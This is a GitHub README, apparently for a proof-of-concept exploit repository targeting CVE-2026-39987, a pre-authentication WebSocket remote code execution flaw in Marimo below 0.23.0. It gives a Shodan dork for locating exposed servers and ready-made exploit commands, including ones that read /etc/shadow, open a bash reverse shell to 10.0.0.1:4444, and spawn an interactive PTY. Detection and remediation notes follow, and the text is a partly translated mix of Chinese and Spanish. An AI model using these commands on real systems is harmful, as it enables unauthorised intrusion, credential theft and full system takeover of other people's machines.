fevar54/marimo_CVE-2026-39987_RCE_PoC

GitHub: fevar54/marimo_CVE-2026-39987_RCE_PoC

针对 Marimo < 0.23.0 的预认证 WebSocket RCE 漏洞提供 PoC 脚本与利用方案。

Stars: 0 | Forks: 0

# CVE-2026-39987 - Marimo < 0.23.0 预认证 RCE (WebSocket) ## ⚠️ 法律警告 ⚠️ ## 📋 描述 低于 0.23.0 版本的 Marimo 存在一个严重的无需预先认证的远程代码执行 (RCE) 漏洞。端点 `/terminal/ws` 没有实施适当的访问控制,允许未经身份验证的攻击者在系统中获取完整的交互式 shell。 | 详情 | 信息 | |---------|-------------| | **CVE** | CVE-2026-39987 | | **严重程度** | 严重 | | **CVSS Score** | 9.3 (CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H) | | **类型** | 预认证远程代码执行 (RCE) | | **向量** | WebSocket (`/terminal/ws`) | | **受影响产品** | Marimo < 0.23.0 | | **补丁** | Marimo ≥ 0.23.0 | ## 🎯 影响 - ✅ 无需认证的远程命令执行 - ✅ 完整的交互式 PTY shell - ✅ 完全控制系统 - ✅ 访问敏感数据 - ✅ 可能的网络横向移动 ## 🔍 识别 ### Shodan Dork http.favicon.hash:-1864630356 text ### 指纹 - Favicon hash: `-1864630356` - 端点版本: `/api/version` ## 💀 漏洞利用 PoC ### 前置条件 ``` pip install websockets requests Uso Básico bash python CVE-2026-39987_PoC.py http://victima.com:8080 "id" Ejemplos bash # 获取系统信息 python CVE-2026-39987_PoC.py http://target.com:8080 "id" python CVE-2026-39987_PoC.py http://target.com:8080 "uname -a" python CVE-2026-39987_PoC.py http://target.com:8080 "whoami" # 读取敏感文件 python CVE-2026-39987_PoC.py http://target.com:8080 "cat /etc/passwd" python CVE-2026-39987_PoC.py http://target.com:8080 "cat /etc/shadow" # Reverse shell python CVE-2026-39987_PoC.py http://target.com:8080 "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1" # 交互式 shell python CVE-2026-39987_PoC.py http://target.com:8080 "python3 -c 'import pty; pty.spawn(\"/bin/bash\")'" 🛡️ Detección (Seguro) Script de detección pasiva bash python detector.py -u http://target.com:8080 python detector.py -l urls.txt Nuclei Template yaml # marimo-cve-2026-39987.yaml id: CVE-2026-39987 info: name: Marimo < 0.23.0 Pre-Auth RCE severity: critical # ... (template completo incluido) 🔧 Remediation Inmediata DESCONECTAR el sistema de la red si está expuesto Bloquear acceso al puerto donde corre Marimo Revisar logs en busca de actividad sospechosa Permanente bash # 升级到已修补版本 pip install --upgrade marimo>=0.23.0 # 验证版本 marimo --version # 若公开暴露则配置身份验证 # 切勿将 'marimo edit' 直接暴露到 internet Docker (Entorno vulnerable) bash # 运行易受攻击的版本进行测试 docker run -p 8080:8080 marimo-team/marimo:0.22.0 # 验证漏洞 python CVE-2026-39987_detector.py http://localhost:8080 # Exploit python CVE-2026-39987_PoC.py http://localhost:8080 "id" GitHub Security Advisory NVD Entry Pull Request #9098 Marimo Documentation 👥 Créditos Descubrimiento: [Nombre del investigador] PoC Desarrollo: [Tu nombre] Parche: Marimo Team 📜 Licencia Este proyecto es solo para fines educativos. El uso de este software es bajo tu propio riesgo. ⭐ Si este README te fue útil, considera darle una estrella al repositorio. ⚠️ RECUERDA: CON GRAN PODER VIENE GRAN RESPONSABILIDAD ```
标签:PoC, WebSocket, 依赖分析, 暴力破解, 未授权访问, 漏洞利用, 编程工具, 远程代码执行